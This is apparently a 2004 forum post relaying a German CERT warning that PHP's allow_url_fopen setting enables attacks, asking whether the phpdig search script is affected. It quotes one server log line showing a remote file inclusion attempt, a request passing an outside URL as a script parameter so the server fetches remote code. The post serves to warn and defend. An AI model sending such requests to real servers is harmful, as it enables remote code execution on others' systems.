Security Risk: allow_url_fopen = ON
The German CERTs (Computer Emergency Response Teams) reports a Security Risk if in php.ini: allow_url_fopen = ON.
Scripts who allow to load URL as parameter can use as attack. Many attacks started last weeks to all servers. In log-Files you found f. ex.: [28/Sep/2004:18:03:07 +0200] "GET /path/to/script.php?variablenname=http://192.168.1.2:4213/ HTTP/1.0" 200 15183 "-" "Wget/1.8.1" Link to message for German User: http://www.heise.de/security/news/meldung/51838 Any secure risk for phpdig ? Roland |
All times are GMT -8. The time now is 03:35 AM. |
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © 2001 - 2005, ThinkDing LLC. All Rights Reserved.